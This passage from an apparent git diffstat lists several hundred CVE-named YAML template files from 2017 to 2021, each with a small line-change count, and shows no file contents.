3 +-- http/cves/2017/CVE-2017-1000163.yaml | 3 +-- http/cves/2017/CVE-2017-1000170.yaml | 3 +-- http/cves/2017/CVE-2017-10075.yaml | 3 +-- http/cves/2017/CVE-2017-11165.yaml | 3 +-- http/cves/2017/CVE-2017-11444.yaml | 3 +-- http/cves/2017/CVE-2017-11586.yaml | 3 +-- http/cves/2017/CVE-2017-11629.yaml | 3 +-- http/cves/2017/CVE-2017-12138.yaml | 3 +-- http/cves/2017/CVE-2017-12583.yaml | 3 +-- http/cves/2017/CVE-2017-12629.yaml | 3 +-- http/cves/2017/CVE-2017-12637.yaml | 3 +-- http/cves/2017/CVE-2017-12794.yaml | 3 +-- http/cves/2017/CVE-2017-14186.yaml | 3 +-- http/cves/2017/CVE-2017-14524.yaml | 3 +-- http/cves/2017/CVE-2017-14535.yaml | 3 +-- http/cves/2017/CVE-2017-14537.yaml | 3 +-- http/cves/2017/CVE-2017-14622.yaml | 3 +-- http/cves/2017/CVE-2017-14651.yaml | 3 +-- http/cves/2017/CVE-2017-15287.yaml | 3 +-- http/cves/2017/CVE-2017-15363.yaml | 3 +-- http/cves/2017/CVE-2017-15647.yaml | 3 +-- http/cves/2017/CVE-2017-16806.yaml | 3 +-- http/cves/2017/CVE-2017-16877.yaml | 3 +-- http/cves/2017/CVE-2017-17043.yaml | 3 +-- http/cves/2017/CVE-2017-17059.yaml | 3 +-- http/cves/2017/CVE-2017-17451.yaml | 3 +-- http/cves/2017/CVE-2017-17731.yaml | 3 +-- http/cves/2017/CVE-2017-17736.yaml | 3 +-- http/cves/2017/CVE-2017-18024.yaml | 3 +-- http/cves/2017/CVE-2017-18487.yaml | 3 +-- http/cves/2017/CVE-2017-18490.yaml | 3 +-- http/cves/2017/CVE-2017-18492.yaml | 3 +-- http/cves/2017/CVE-2017-18493.yaml | 3 +-- http/cves/2017/CVE-2017-18494.yaml | 3 +-- http/cves/2017/CVE-2017-18496.yaml | 3 +-- http/cves/2017/CVE-2017-18500.yaml | 3 +-- http/cves/2017/CVE-2017-18501.yaml | 3 +-- http/cves/2017/CVE-2017-18502.yaml | 3 +-- http/cves/2017/CVE-2017-18505.yaml | 3 +-- http/cves/2017/CVE-2017-18516.yaml | 3 +-- http/cves/2017/CVE-2017-18517.yaml | 3 +-- http/cves/2017/CVE-2017-18518.yaml | 3 +-- http/cves/2017/CVE-2017-18527.yaml | 3 +-- http/cves/2017/CVE-2017-18528.yaml | 3 +-- http/cves/2017/CVE-2017-18529.yaml | 3 +-- http/cves/2017/CVE-2017-18530.yaml | 3 +-- http/cves/2017/CVE-2017-18532.yaml | 3 +-- http/cves/2017/CVE-2017-18536.yaml | 3 +-- http/cves/2017/CVE-2017-18537.yaml | 3 +-- http/cves/2017/CVE-2017-18542.yaml | 3 +-- http/cves/2017/CVE-2017-18556.yaml | 3 +-- http/cves/2017/CVE-2017-18558.yaml | 3 +-- http/cves/2017/CVE-2017-18562.yaml | 3 +-- http/cves/2017/CVE-2017-18564.yaml | 3 +-- http/cves/2017/CVE-2017-18565.yaml | 3 +-- http/cves/2017/CVE-2017-18566.yaml | 3 +-- http/cves/2017/CVE-2017-18598.yaml | 3 +-- http/cves/2017/CVE-2017-18638.yaml | 3 +-- http/cves/2017/CVE-2017-3528.yaml | 3 +-- http/cves/2017/CVE-2017-4011.yaml | 3 +-- http/cves/2017/CVE-2017-5487.yaml | 3 +-- http/cves/2017/CVE-2017-5631.yaml | 3 +-- http/cves/2017/CVE-2017-5982.yaml | 3 +-- http/cves/2017/CVE-2017-7921.yaml | 3 +-- http/cves/2017/CVE-2017-7925.yaml | 3 +-- http/cves/2017/CVE-2017-8229.yaml | 3 +-- http/cves/2017/CVE-2017-9140.yaml | 3 +-- http/cves/2017/CVE-2017-9288.yaml | 3 +-- http/cves/2017/CVE-2017-9416.yaml | 3 +-- http/cves/2017/CVE-2017-9506.yaml | 3 +-- http/cves/2017/CVE-2017-9822.yaml | 3 +-- http/cves/2017/CVE-2017-9833.yaml | 3 +-- http/cves/2018/CVE-2018-0127.yaml | 3 +-- http/cves/2018/CVE-2018-0296.yaml | 3 +-- http/cves/2018/CVE-2018-1000129.yaml | 3 +-- http/cves/2018/CVE-2018-1000130.yaml | 3 +-- http/cves/2018/CVE-2018-1000226.yaml | 3 +-- http/cves/2018/CVE-2018-1000671.yaml | 3 +-- http/cves/2018/CVE-2018-1000856.yaml | 3 +-- http/cves/2018/CVE-2018-10093.yaml | 3 +-- http/cves/2018/CVE-2018-10095.yaml | 3 +-- http/cves/2018/CVE-2018-10141.yaml | 3 +-- http/cves/2018/CVE-2018-10201.yaml | 3 +-- http/cves/2018/CVE-2018-10230.yaml | 3 +-- http/cves/2018/CVE-2018-10822.yaml | 3 +-- http/cves/2018/CVE-2018-11231.yaml | 3 +-- http/cves/2018/CVE-2018-11409.yaml | 3 +-- http/cves/2018/CVE-2018-11473.yaml | 3 +-- http/cves/2018/CVE-2018-11709.yaml | 3 +-- http/cves/2018/CVE-2018-11759.yaml | 3 +-- http/cves/2018/CVE-2018-11784.yaml | 3 +-- http/cves/2018/CVE-2018-12031.yaml | 3 +-- http/cves/2018/CVE-2018-12054.yaml | 3 +-- http/cves/2018/CVE-2018-1207.yaml | 3 +-- http/cves/2018/CVE-2018-12095.yaml | 3 +-- http/cves/2018/CVE-2018-12296.yaml | 3 +-- http/cves/2018/CVE-2018-12300.yaml | 3 +-- http/cves/2018/CVE-2018-12634.yaml | 3 +-- http/cves/2018/CVE-2018-12675.yaml | 3 +-- http/cves/2018/CVE-2018-1271.yaml | 3 +-- http/cves/2018/CVE-2018-12909.yaml | 3 +-- http/cves/2018/CVE-2018-13380.yaml | 3 +-- http/cves/2018/CVE-2018-13980.yaml | 3 +-- http/cves/2018/CVE-2018-14013.yaml | 3 +-- http/cves/2018/CVE-2018-14474.yaml | 3 +-- http/cves/2018/CVE-2018-14574.yaml | 3 +-- http/cves/2018/CVE-2018-14916.yaml | 3 +-- http/cves/2018/CVE-2018-14918.yaml | 3 +-- http/cves/2018/CVE-2018-14931.yaml | 3 +-- http/cves/2018/CVE-2018-15517.yaml | 3 +-- http/cves/2018/CVE-2018-15745.yaml | 3 +-- http/cves/2018/CVE-2018-15917.yaml | 3 +-- http/cves/2018/CVE-2018-16059.yaml | 3 +-- http/cves/2018/CVE-2018-16133.yaml | 3 +-- http/cves/2018/CVE-2018-16139.yaml | 3 +-- http/cves/2018/CVE-2018-16159.yaml | 3 +-- http/cves/2018/CVE-2018-16167.yaml | 3 +-- http/cves/2018/CVE-2018-16283.yaml | 3 +-- http/cves/2018/CVE-2018-16288.yaml | 3 +-- http/cves/2018/CVE-2018-16299.yaml | 3 +-- http/cves/2018/CVE-2018-16668.yaml | 3 +-- http/cves/2018/CVE-2018-16670.yaml | 3 +-- http/cves/2018/CVE-2018-16671.yaml | 3 +-- http/cves/2018/CVE-2018-16716.yaml | 3 +-- http/cves/2018/CVE-2018-16761.yaml | 3 +-- http/cves/2018/CVE-2018-16836.yaml | 3 +-- http/cves/2018/CVE-2018-16979.yaml | 3 +-- http/cves/2018/CVE-2018-17153.yaml | 3 +-- http/cves/2018/CVE-2018-17246.yaml | 3 +-- http/cves/2018/CVE-2018-17254.yaml | 3 +-- http/cves/2018/CVE-2018-17422.yaml | 3 +-- http/cves/2018/CVE-2018-17431.yaml | 3 +-- http/cves/2018/CVE-2018-18069.yaml | 3 +-- http/cves/2018/CVE-2018-18570.yaml | 3 +-- http/cves/2018/CVE-2018-18608.yaml | 3 +-- http/cves/2018/CVE-2018-18775.yaml | 3 +-- http/cves/2018/CVE-2018-18777.yaml | 3 +-- http/cves/2018/CVE-2018-18809.yaml | 3 +-- http/cves/2018/CVE-2018-18925.yaml | 3 +-- http/cves/2018/CVE-2018-19136.yaml | 3 +-- http/cves/2018/CVE-2018-19137.yaml | 3 +-- http/cves/2018/CVE-2018-19287.yaml | 3 +-- http/cves/2018/CVE-2018-19326.yaml | 3 +-- http/cves/2018/CVE-2018-19365.yaml | 3 +-- http/cves/2018/CVE-2018-19386.yaml | 3 +-- http/cves/2018/CVE-2018-19439.yaml | 3 +-- http/cves/2018/CVE-2018-19458.yaml | 3 +-- http/cves/2018/CVE-2018-19749.yaml | 3 +-- http/cves/2018/CVE-2018-19751.yaml | 3 +-- http/cves/2018/CVE-2018-19752.yaml | 3 +-- http/cves/2018/CVE-2018-19753.yaml | 3 +-- http/cves/2018/CVE-2018-19877.yaml | 3 +-- http/cves/2018/CVE-2018-19892.yaml | 3 +-- http/cves/2018/CVE-2018-19914.yaml | 3 +-- http/cves/2018/CVE-2018-19915.yaml | 3 +-- http/cves/2018/CVE-2018-20009.yaml | 3 +-- http/cves/2018/CVE-2018-20010.yaml | 3 +-- http/cves/2018/CVE-2018-20011.yaml | 3 +-- http/cves/2018/CVE-2018-20462.yaml | 3 +-- http/cves/2018/CVE-2018-20463.yaml | 3 +-- http/cves/2018/CVE-2018-20526.yaml | 3 +-- http/cves/2018/CVE-2018-20608.yaml | 3 +-- http/cves/2018/CVE-2018-20824.yaml | 3 +-- http/cves/2018/CVE-2018-20985.yaml | 3 +-- http/cves/2018/CVE-2018-2392.yaml | 2 +- http/cves/2018/CVE-2018-2791.yaml | 3 +-- http/cves/2018/CVE-2018-2894.yaml | 3 +-- http/cves/2018/CVE-2018-3167.yaml | 3 +-- http/cves/2018/CVE-2018-3238.yaml | 3 +-- http/cves/2018/CVE-2018-3714.yaml | 3 +-- http/cves/2018/CVE-2018-3760.yaml | 3 +-- http/cves/2018/CVE-2018-3810.yaml | 3 +-- http/cves/2018/CVE-2018-5230.yaml | 3 +-- http/cves/2018/CVE-2018-5233.yaml | 3 +-- http/cves/2018/CVE-2018-5316.yaml | 3 +-- http/cves/2018/CVE-2018-5715.yaml | 3 +-- http/cves/2018/CVE-2018-6008.yaml | 3 +-- http/cves/2018/CVE-2018-6184.yaml | 3 +-- http/cves/2018/CVE-2018-6200.yaml | 3 +-- http/cves/2018/CVE-2018-6530.yaml | 3 +-- http/cves/2018/CVE-2018-6910.yaml | 3 +-- http/cves/2018/CVE-2018-7251.yaml | 3 +-- http/cves/2018/CVE-2018-7282.yaml | 3 +-- http/cves/2018/CVE-2018-7422.yaml | 3 +-- http/cves/2018/CVE-2018-7467.yaml | 3 +-- http/cves/2018/CVE-2018-7490.yaml | 3 +-- http/cves/2018/CVE-2018-7653.yaml | 3 +-- http/cves/2018/CVE-2018-7662.yaml | 3 +-- http/cves/2018/CVE-2018-7719.yaml | 3 +-- http/cves/2018/CVE-2018-8715.yaml | 3 +-- http/cves/2018/CVE-2018-8719.yaml | 3 +-- http/cves/2018/CVE-2018-8727.yaml | 3 +-- http/cves/2018/CVE-2018-8770.yaml | 3 +-- http/cves/2018/CVE-2018-9118.yaml | 3 +-- http/cves/2018/CVE-2018-9205.yaml | 3 +-- http/cves/2018/CVE-2018-9845.yaml | 3 +-- http/cves/2019/CVE-2019-0193.yaml | 3 +-- http/cves/2019/CVE-2019-0221.yaml | 3 +-- http/cves/2019/CVE-2019-10092.yaml | 3 +-- http/cves/2019/CVE-2019-10098.yaml | 3 +-- http/cves/2019/CVE-2019-1010287.yaml | 3 +-- http/cves/2019/CVE-2019-10232.yaml | 3 +-- http/cves/2019/CVE-2019-10405.yaml | 3 +-- http/cves/2019/CVE-2019-10475.yaml | 3 +-- http/cves/2019/CVE-2019-10717.yaml | 3 +-- http/cves/2019/CVE-2019-11013.yaml | 3 +-- http/cves/2019/CVE-2019-11370.yaml | 3 +-- http/cves/2019/CVE-2019-12461.yaml | 3 +-- http/cves/2019/CVE-2019-12581.yaml | 3 +-- http/cves/2019/CVE-2019-12583.yaml | 3 +-- http/cves/2019/CVE-2019-12593.yaml | 3 +-- http/cves/2019/CVE-2019-12616.yaml | 3 +-- http/cves/2019/CVE-2019-12725.yaml | 3 +-- http/cves/2019/CVE-2019-12962.yaml | 3 +-- http/cves/2019/CVE-2019-12990.yaml | 3 +-- http/cves/2019/CVE-2019-13101.yaml | 3 +-- http/cves/2019/CVE-2019-13392.yaml | 3 +-- http/cves/2019/CVE-2019-13396.yaml | 3 +-- http/cves/2019/CVE-2019-13462.yaml | 3 +-- http/cves/2019/CVE-2019-14205.yaml | 3 +-- http/cves/2019/CVE-2019-14223.yaml | 3 +-- http/cves/2019/CVE-2019-14251.yaml | 3 +-- http/cves/2019/CVE-2019-14312.yaml | 3 +-- http/cves/2019/CVE-2019-14470.yaml | 3 +-- http/cves/2019/CVE-2019-14530.yaml | 3 +-- http/cves/2019/CVE-2019-14696.yaml | 3 +-- http/cves/2019/CVE-2019-14750.yaml | 3 +-- http/cves/2019/CVE-2019-14789.yaml | 3 +-- http/cves/2019/CVE-2019-14974.yaml | 3 +-- http/cves/2019/CVE-2019-15501.yaml | 3 +-- http/cves/2019/CVE-2019-15642.yaml | 3 +-- http/cves/2019/CVE-2019-15713.yaml | 3 +-- http/cves/2019/CVE-2019-15811.yaml | 3 +-- http/cves/2019/CVE-2019-15829.yaml | 3 +-- http/cves/2019/CVE-2019-15858.yaml | 3 +-- http/cves/2019/CVE-2019-15859.yaml | 3 +-- http/cves/2019/CVE-2019-15889.yaml | 3 +-- http/cves/2019/CVE-2019-16123.yaml | 3 +-- http/cves/2019/CVE-2019-16313.yaml | 3 +-- http/cves/2019/CVE-2019-16332.yaml | 3 +-- http/cves/2019/CVE-2019-16920.yaml | 3 +-- http/cves/2019/CVE-2019-16931.yaml | 3 +-- http/cves/2019/CVE-2019-16932.yaml | 3 +-- http/cves/2019/CVE-2019-16996.yaml | 3 +-- http/cves/2019/CVE-2019-16997.yaml | 3 +-- http/cves/2019/CVE-2019-17418.yaml | 3 +-- http/cves/2019/CVE-2019-17444.yaml | 3 +-- http/cves/2019/CVE-2019-17503.yaml | 3 +-- http/cves/2019/CVE-2019-17506.yaml | 3 +-- http/cves/2019/CVE-2019-17538.yaml | 3 +-- http/cves/2019/CVE-2019-17574.yaml | 3 +-- http/cves/2019/CVE-2019-17662.yaml | 3 +-- http/cves/2019/CVE-2019-18393.yaml | 3 +-- http/cves/2019/CVE-2019-18394.yaml | 3 +-- http/cves/2019/CVE-2019-18665.yaml | 3 +-- http/cves/2019/CVE-2019-18957.yaml | 3 +-- http/cves/2019/CVE-2019-1898.yaml | 3 +-- http/cves/2019/CVE-2019-19368.yaml | 3 +-- http/cves/2019/CVE-2019-1943.yaml | 3 +-- http/cves/2019/CVE-2019-19824.yaml | 3 +-- http/cves/2019/CVE-2019-19908.yaml | 3 +-- http/cves/2019/CVE-2019-19985.yaml | 3 +-- http/cves/2019/CVE-2019-20141.yaml | 3 +-- http/cves/2019/CVE-2019-20183.yaml | 3 +-- http/cves/2019/CVE-2019-20210.yaml | 3 +-- http/cves/2019/CVE-2019-20933.yaml | 3 +-- http/cves/2019/CVE-2019-2578.yaml | 3 +-- http/cves/2019/CVE-2019-2579.yaml | 3 +-- http/cves/2019/CVE-2019-2588.yaml | 3 +-- http/cves/2019/CVE-2019-2616.yaml | 3 +-- http/cves/2019/CVE-2019-2767.yaml | 3 +-- http/cves/2019/CVE-2019-3401.yaml | 2 +- http/cves/2019/CVE-2019-3402.yaml | 3 +-- http/cves/2019/CVE-2019-3403.yaml | 3 +-- http/cves/2019/CVE-2019-3911.yaml | 3 +-- http/cves/2019/CVE-2019-3912.yaml | 3 +-- http/cves/2019/CVE-2019-3929.yaml | 3 +-- http/cves/2019/CVE-2019-5127.yaml | 3 +-- http/cves/2019/CVE-2019-6112.yaml | 3 +-- http/cves/2019/CVE-2019-6799.yaml | 3 +-- http/cves/2019/CVE-2019-6802.yaml | 3 +-- http/cves/2019/CVE-2019-7219.yaml | 3 +-- http/cves/2019/CVE-2019-7254.yaml | 3 +-- http/cves/2019/CVE-2019-7255.yaml | 3 +-- http/cves/2019/CVE-2019-7275.yaml | 3 +-- http/cves/2019/CVE-2019-7315.yaml | 3 +-- http/cves/2019/CVE-2019-7481.yaml | 3 +-- http/cves/2019/CVE-2019-7543.yaml | 3 +-- http/cves/2019/CVE-2019-7609.yaml | 3 +-- http/cves/2019/CVE-2019-8086.yaml | 3 +-- http/cves/2019/CVE-2019-8390.yaml | 3 +-- http/cves/2019/CVE-2019-8442.yaml | 3 +-- http/cves/2019/CVE-2019-8446.yaml | 3 +-- http/cves/2019/CVE-2019-8451.yaml | 3 +-- http/cves/2019/CVE-2019-8903.yaml | 3 +-- http/cves/2019/CVE-2019-8937.yaml | 3 +-- http/cves/2019/CVE-2019-8982.yaml | 3 +-- http/cves/2019/CVE-2019-9041.yaml | 3 +-- http/cves/2019/CVE-2019-9618.yaml | 3 +-- http/cves/2019/CVE-2019-9670.yaml | 3 +-- http/cves/2019/CVE-2019-9726.yaml | 3 +-- http/cves/2019/CVE-2019-9733.yaml | 3 +-- http/cves/2019/CVE-2019-9915.yaml | 3 +-- http/cves/2019/CVE-2019-9922.yaml | 3 +-- http/cves/2019/CVE-2019-9955.yaml | 3 +-- http/cves/2020/CVE-2020-10148.yaml | 3 +-- http/cves/2020/CVE-2020-10220.yaml | 3 +-- http/cves/2020/CVE-2020-10546.yaml | 3 +-- http/cves/2020/CVE-2020-10547.yaml | 3 +-- http/cves/2020/CVE-2020-10548.yaml | 3 +-- http/cves/2020/CVE-2020-10549.yaml | 3 +-- http/cves/2020/CVE-2020-10770.yaml | 3 +-- http/cves/2020/CVE-2020-10973.yaml | 3 +-- http/cves/2020/CVE-2020-11034.yaml | 3 +-- http/cves/2020/CVE-2020-11110.yaml | 3 +-- http/cves/2020/CVE-2020-11450.yaml | 3 +-- http/cves/2020/CVE-2020-11455.yaml | 3 +-- http/cves/2020/CVE-2020-11529.yaml | 3 +-- http/cves/2020/CVE-2020-11547.yaml | 3 +-- http/cves/2020/CVE-2020-11710.yaml | 3 +-- http/cves/2020/CVE-2020-11853.yaml | 3 +-- http/cves/2020/CVE-2020-11930.yaml | 3 +-- http/cves/2020/CVE-2020-11991.yaml | 3 +-- http/cves/2020/CVE-2020-12054.yaml | 3 +-- http/cves/2020/CVE-2020-12127.yaml | 3 +-- http/cves/2020/CVE-2020-12256.yaml | 3 +-- http/cves/2020/CVE-2020-12259.yaml | 3 +-- http/cves/2020/CVE-2020-12447.yaml | 3 +-- http/cves/2020/CVE-2020-12478.yaml | 3 +-- http/cves/2020/CVE-2020-12800.yaml | 3 +-- http/cves/2020/CVE-2020-13117.yaml | 3 +-- http/cves/2020/CVE-2020-13121.yaml | 3 +-- http/cves/2020/CVE-2020-13158.yaml | 3 +-- http/cves/2020/CVE-2020-13258.yaml | 3 +-- http/cves/2020/CVE-2020-13405.yaml | 3 +-- http/cves/2020/CVE-2020-13483.yaml | 3 +-- http/cves/2020/CVE-2020-13700.yaml | 3 +-- http/cves/2020/CVE-2020-13820.yaml | 3 +-- http/cves/2020/CVE-2020-13945.yaml | 3 +-- http/cves/2020/CVE-2020-14092.yaml | 3 +-- http/cves/2020/CVE-2020-14179.yaml | 3 +-- http/cves/2020/CVE-2020-14181.yaml | 3 +-- http/cves/2020/CVE-2020-14408.yaml | 3 +-- http/cves/2020/CVE-2020-14413.yaml | 3 +-- http/cves/2020/CVE-2020-14864.yaml | 3 +-- http/cves/2020/CVE-2020-15050.yaml | 3 +-- http/cves/2020/CVE-2020-15129.yaml | 3 +-- http/cves/2020/CVE-2020-15148.yaml | 3 +-- http/cves/2020/CVE-2020-15227.yaml | 3 +-- http/cves/2020/CVE-2020-15500.yaml | 3 +-- http/cves/2020/CVE-2020-15568.yaml | 3 +-- http/cves/2020/CVE-2020-15895.yaml | 3 +-- http/cves/2020/CVE-2020-16139.yaml | 3 +-- http/cves/2020/CVE-2020-17362.yaml | 3 +-- http/cves/2020/CVE-2020-17453.yaml | 3 +-- http/cves/2020/CVE-2020-17506.yaml | 3 +-- http/cves/2020/CVE-2020-18268.yaml | 3 +-- http/cves/2020/CVE-2020-19282.yaml | 3 +-- http/cves/2020/CVE-2020-19283.yaml | 3 +-- http/cves/2020/CVE-2020-19295.yaml | 3 +-- http/cves/2020/CVE-2020-19360.yaml | 3 +-- http/cves/2020/CVE-2020-19515.yaml | 3 +-- http/cves/2020/CVE-2020-20285.yaml | 3 +-- http/cves/2020/CVE-2020-20300.yaml | 3 +-- http/cves/2020/CVE-2020-2036.yaml | 3 +-- http/cves/2020/CVE-2020-20982.yaml | 3 +-- http/cves/2020/CVE-2020-20988.yaml | 3 +-- http/cves/2020/CVE-2020-21012.yaml | 3 +-- http/cves/2020/CVE-2020-2103.yaml | 3 +-- http/cves/2020/CVE-2020-21224.yaml | 3 +-- http/cves/2020/CVE-2020-2140.yaml | 3 +-- http/cves/2020/CVE-2020-22208.yaml | 3 +-- http/cves/2020/CVE-2020-22209.yaml | 3 +-- http/cves/2020/CVE-2020-22210.yaml | 3 +-- http/cves/2020/CVE-2020-22211.yaml | 3 +-- http/cves/2020/CVE-2020-22840.yaml | 3 +-- http/cves/2020/CVE-2020-23015.yaml | 3 +-- http/cves/2020/CVE-2020-23517.yaml | 3 +-- http/cves/2020/CVE-2020-23575.yaml | 3 +-- http/cves/2020/CVE-2020-23697.yaml | 3 +-- http/cves/2020/CVE-2020-23972.yaml | 3 +-- http/cves/2020/CVE-2020-24148.yaml | 3 +-- http/cves/2020/CVE-2020-24223.yaml | 3 +-- http/cves/2020/CVE-2020-24312.yaml | 3 +-- http/cves/2020/CVE-2020-24550.yaml | 3 +-- http/cves/2020/CVE-2020-24571.yaml | 3 +-- http/cves/2020/CVE-2020-24579.yaml | 3 +-- http/cves/2020/CVE-2020-24902.yaml | 3 +-- http/cves/2020/CVE-2020-24903.yaml | 3 +-- http/cves/2020/CVE-2020-24912.yaml | 3 +-- http/cves/2020/CVE-2020-24949.yaml | 3 +-- http/cves/2020/CVE-2020-25495.yaml | 3 +-- http/cves/2020/CVE-2020-25780.yaml | 3 +-- http/cves/2020/CVE-2020-25864.yaml | 3 +-- http/cves/2020/CVE-2020-26153.yaml | 3 +-- http/cves/2020/CVE-2020-26214.yaml | 3 +-- http/cves/2020/CVE-2020-26248.yaml | 3 +-- http/cves/2020/CVE-2020-26876.yaml | 3 +-- http/cves/2020/CVE-2020-26919.yaml | 3 +-- http/cves/2020/CVE-2020-26948.yaml | 3 +-- http/cves/2020/CVE-2020-27191.yaml | 3 +-- http/cves/2020/CVE-2020-2733.yaml | 3 +-- http/cves/2020/CVE-2020-27361.yaml | 3 +-- http/cves/2020/CVE-2020-27467.yaml | 3 +-- http/cves/2020/CVE-2020-27481.yaml | 3 +-- http/cves/2020/CVE-2020-27735.yaml | 3 +-- http/cves/2020/CVE-2020-27866.yaml | 3 +-- http/cves/2020/CVE-2020-27982.yaml | 3 +-- http/cves/2020/CVE-2020-27986.yaml | 3 +-- http/cves/2020/CVE-2020-28185.yaml | 3 +-- http/cves/2020/CVE-2020-28208.yaml | 3 +-- http/cves/2020/CVE-2020-28351.yaml | 3 +-- http/cves/2020/CVE-2020-28976.yaml | 3 +-- http/cves/2020/CVE-2020-29164.yaml | 3 +-- http/cves/2020/CVE-2020-29227.yaml | 3 +-- http/cves/2020/CVE-2020-29284.yaml | 3 +-- http/cves/2020/CVE-2020-29395.yaml | 3 +-- http/cves/2020/CVE-2020-29453.yaml | 3 +-- http/cves/2020/CVE-2020-29583.yaml | 3 +-- http/cves/2020/CVE-2020-29597.yaml | 3 +-- http/cves/2020/CVE-2020-3187.yaml | 3 +-- http/cves/2020/CVE-2020-35234.yaml | 3 +-- http/cves/2020/CVE-2020-35338.yaml | 3 +-- http/cves/2020/CVE-2020-35476.yaml | 3 +-- http/cves/2020/CVE-2020-35489.yaml | 3 +-- http/cves/2020/CVE-2020-35580.yaml | 3 +-- http/cves/2020/CVE-2020-35598.yaml | 3 +-- http/cves/2020/CVE-2020-35713.yaml | 3 +-- http/cves/2020/CVE-2020-35736.yaml | 3 +-- http/cves/2020/CVE-2020-35749.yaml | 3 +-- http/cves/2020/CVE-2020-35846.yaml | 3 +-- http/cves/2020/CVE-2020-35951.yaml | 3 +-- http/cves/2020/CVE-2020-35984.yaml | 3 +-- http/cves/2020/CVE-2020-35985.yaml | 3 +-- http/cves/2020/CVE-2020-35986.yaml | 3 +-- http/cves/2020/CVE-2020-35987.yaml | 3 +-- http/cves/2020/CVE-2020-36112.yaml | 3 +-- http/cves/2020/CVE-2020-36510.yaml | 3 +-- http/cves/2020/CVE-2020-4463.yaml | 3 +-- http/cves/2020/CVE-2020-5191.yaml | 3 +-- http/cves/2020/CVE-2020-5192.yaml | 3 +-- http/cves/2020/CVE-2020-5284.yaml | 3 +-- http/cves/2020/CVE-2020-5307.yaml | 3 +-- http/cves/2020/CVE-2020-5405.yaml | 3 +-- http/cves/2020/CVE-2020-5775.yaml | 3 +-- http/cves/2020/CVE-2020-5777.yaml | 3 +-- http/cves/2020/CVE-2020-6171.yaml | 3 +-- http/cves/2020/CVE-2020-6308.yaml | 3 +-- http/cves/2020/CVE-2020-6637.yaml | 3 +-- http/cves/2020/CVE-2020-6950.yaml | 3 +-- http/cves/2020/CVE-2020-7107.yaml | 3 +-- http/cves/2020/CVE-2020-7136.yaml | 3 +-- http/cves/2020/CVE-2020-7209.yaml | 3 +-- http/cves/2020/CVE-2020-7318.yaml | 3 +-- http/cves/2020/CVE-2020-7796.yaml | 3 +-- http/cves/2020/CVE-2020-7943.yaml | 3 +-- http/cves/2020/CVE-2020-8115.yaml | 3 +-- http/cves/2020/CVE-2020-8191.yaml | 3 +-- http/cves/2020/CVE-2020-8194.yaml | 3 +-- http/cves/2020/CVE-2020-8497.yaml | 3 +-- http/cves/2020/CVE-2020-8512.yaml | 3 +-- http/cves/2020/CVE-2020-8615.yaml | 3 +-- http/cves/2020/CVE-2020-8641.yaml | 3 +-- http/cves/2020/CVE-2020-8644.yaml | 3 +-- http/cves/2020/CVE-2020-8654.yaml | 3 +-- http/cves/2020/CVE-2020-8771.yaml | 3 +-- http/cves/2020/CVE-2020-8982.yaml | 3 +-- http/cves/2020/CVE-2020-9036.yaml | 3 +-- http/cves/2020/CVE-2020-9043.yaml | 3 +-- http/cves/2020/CVE-2020-9047.yaml | 3 +-- http/cves/2020/CVE-2020-9344.yaml | 3 +-- http/cves/2020/CVE-2020-9376.yaml | 3 +-- http/cves/2020/CVE-2020-9402.yaml | 3 +-- http/cves/2020/CVE-2020-9425.yaml | 3 +-- http/cves/2020/CVE-2020-9483.yaml | 3 +-- http/cves/2021/CVE-2021-20031.yaml | 3 +-- http/cves/2021/CVE-2021-20038.yaml | 3 +-- http/cves/2021/CVE-2021-20091.yaml | 3 +-- http/cves/2021/CVE-2021-20092.yaml | 3 +-- http/cves/2021/CVE-2021-20114.yaml | 3 +-- http/cves/2021/CVE-2021-20123.yaml | 3 +-- http/cves/2021/CVE-2021-20124.yaml | 3 +-- http/cves/2021/CVE-2021-20150.yaml | 3 +-- http/cves/2021/CVE-2021-20158.yaml | 3 +-- http/cves/2021/CVE-2021-20323.yaml | 3 +-- http/cves/2021/CVE-2021-21087.yaml | 3 +-- http/cves/2021/CVE-2021-21287.yaml | 3 +-- http/cves/2021/CVE-2021-21311.yaml | 3 +-- http/cves/2021/CVE-2021-21345.yaml | 3 +-- http/cves/2021/CVE-2021-21402.yaml | 3 +-- http/cves/2021/CVE-2021-21479.yaml | 3 +-- http/cves/2021/CVE-2021-21816.yaml | 3 +-- http/cves/2021/CVE-2021-22053.yaml | 3 +-- http/cves/2021/CVE-2021-22122.yaml | 3 +-- http/cves/2021/CVE-2021-22214.yaml | 3 +-- http/cves/2021/CVE-2021-22707.yaml | 3 +-- http/cves/2021/CVE-2021-22873.yaml | 3 +-- http/cves/2021/CVE-2021-22911.yaml | 3 +-- http/cves/2021/CVE-2021-23241.yaml | 3 +-- http/cves/2021/CVE-2021-24146.yaml | 3 +-- http/cves/2021/CVE-2021-24150.yaml | 3 +-- http/cves/2021/CVE-2021-24155.yaml | 3 +-- http/cves/2021/CVE-2021-24165.yaml | 3 +-- http/cves/2021/CVE-2021-24169.yaml | 3 +-- http/cves/2021/CVE-2021-24176.yaml | 3 +-- http/cves/2021/CVE-2021-24210.yaml | 3 +-- http/cves/2021/CVE-2021-24214.yaml | 3 +-- http/cves/2021/CVE-2021-24215.yaml | 3 +-- http/cves/2021/CVE-2021-24226.yaml | 3 +-- http/cves/2021/CVE-2021-24227.yaml | 3 +-- http/cves/2021/CVE-2021-24235.yaml | 3 +-- http/cves/2021/CVE-2021-24236.yaml | 3 +-- http/cves/2021/CVE-2021-24237.yaml | 3 +-- http/cves/2021/CVE-2021-24239.yaml | 3 +-- http/cves/2021/CVE-2021-24245.yaml | 3 +-- http/cves/2021/CVE-2021-24274.yaml | 3 +-- http/cves/2021/CVE-2021-24275.yaml | 3 +-- http/cves/2021/CVE-2021-24276.yaml | 3 +-- http/cves/2021/CVE-2021-24278.yaml | 3 +-- http/cves/2021/CVE-2021-24285.yaml | 3 +-- http/cves/2021/CVE-2021-24286.yaml | 3 +-- http/cves/2021/CVE-2021-24287.yaml | 3 +-- http/cves/2021/CVE-2021-24288.yaml | 3 +-- http/cves/2021/CVE-2021-24291.yaml | 3 +-- http/cves/2021/CVE-2021-24298.yaml | 3 +-- http/cves/2021/CVE-2021-24300.yaml | 3 +-- http/cves/2021/CVE-2021-24316.yaml | 3 +-- http/cves/2021/CVE-2021-24320.yaml | 3 +-- http/cves/2021/CVE-2021-24335.yaml | 3 +-- http/cves/2021/CVE-2021-24340.yaml | 3 +-- http/cves/2021/CVE-2021-24342.yaml | 3 +-- http/cves/2021/CVE-2021-24351.yaml | 3 +-- http/cves/2021/CVE-2021-24358.yaml | 3 +-- http/cves/2021/CVE-2021-24364.yaml | 3 +-- http/cves/2021/CVE-2021-24370.yaml | 3 +-- 